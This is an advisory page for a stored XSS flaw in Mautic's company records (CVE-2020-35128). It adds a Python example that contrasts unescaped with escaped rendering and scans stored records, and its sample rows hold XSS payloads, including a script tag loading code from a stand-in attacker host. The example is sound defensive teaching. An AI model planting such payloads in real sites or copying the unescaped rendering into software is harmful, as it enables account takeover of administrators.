CVE-2020-35128 Information

Description

Mautic before 3.2.4 (and 2.x before 2.16.5) is affected by stored XSS. An attacker with permission to manage companies, an application feature, could attack other users, including administrators. For example, by storing a payload that loads an externally hosted JavaScript file, an attacker could eventually perform actions as the target user when that user views the affected record. These actions include changing user passwords, altering usernames or email addresses, or adding a new administrator to the system.
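To make the failure mode concrete, the following is an added example (not Mautic's own code): a company-name field rendered without output encoding beside the same field rendered with context-appropriate escaping, plus a small scanner an administrator could run over exported company records after patching to find payloads that were stored before the fix. The record layout, the field names `companyname` and `companywebsite`, and the sample rows are assumptions constructed for illustration; only the attack shape (a company field carrying markup that loads an external script) comes from the advisory.

```python
"""Stored XSS via a company record: unescaped vs escaped rendering, and a
triage scan for payloads already sitting in stored records.

Added example, not Mautic's code. Field names, record format and sample
rows are assumptions for illustration.
"""
import html
import re

# Constructed sample records (not real data). Record 1 is benign; 2, 3 and 4
# carry the kinds of payload a "manage companies" user could store.
COMPANIES = [
    {"id": 1, "companyname": "Acme Corp",
     "companywebsite": "https://acme.example"},
    {"id": 2, "companyname": '<script src="https://attacker.example/x.js"></script>',
     "companywebsite": "https://attacker.example"},
    {"id": 3, "companyname": 'Widgets "R" Us',
     "companywebsite": "javascript:alert(1)"},
    {"id": 4, "companyname": '<img src=x onerror="alert(document.cookie)">',
     "companywebsite": "https://widgets.example"},
]


def render_vulnerable(company):
    """Interpolates the stored value straight into HTML, so whatever the
    attacker saved is parsed as markup in the victim's browser."""
    return f'<td>{company["companyname"]}</td>'


def render_fixed(company):
    """Same cell with HTML entity encoding: the stored value becomes inert
    text. Attribute and JavaScript contexts need their own encoders; this
    covers element-content only."""
    return f'<td>{html.escape(company["companyname"], quote=True)}</td>'


# Patterns that should never appear in a company name or website field.
# Deliberately broad: a triage scan should over-flag, not under-flag.
SUSPICIOUS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),              # inline event handlers
    re.compile(r"javascript\s*:", re.I),              # javascript: URIs
    re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),
]


def find_stored_payloads(companies, fields=("companyname", "companywebsite")):
    """Return (record id, field, matching pattern) for every field whose
    stored value looks like markup or script. One hit per field."""
    hits = []
    for company in companies:
        for field in fields:
            value = str(company.get(field, ""))
            for pattern in SUSPICIOUS:
                if pattern.search(value):
                    hits.append((company["id"], field, pattern.pattern))
                    break
    return hits


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(COMPANIES[1]))
    print("fixed:     ", render_fixed(COMPANIES[1]))
    for record_id, field, pattern in find_stored_payloads(COMPANIES):
        print(f"record {record_id}: field {field!r} matches {pattern!r}")
```

The scan is a post-incident aid, not a fix: patching removes the rendering bug, but records written before the patch still hold the payload and should be reviewed and cleaned, and the users who opened those records should be treated as potentially compromised.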

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Reference

https://forum.mautic.org/c/announcements/16
https://labs.bishopfox.com/advisories/mautic-version-3.2.2
https://forum.mautic.org/t/security-release-for-all-versions-of-mautic-prior-to-2-16-5-and-3-2-4/17786

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

Base Score

9.0

Base Severity

CRITICAL
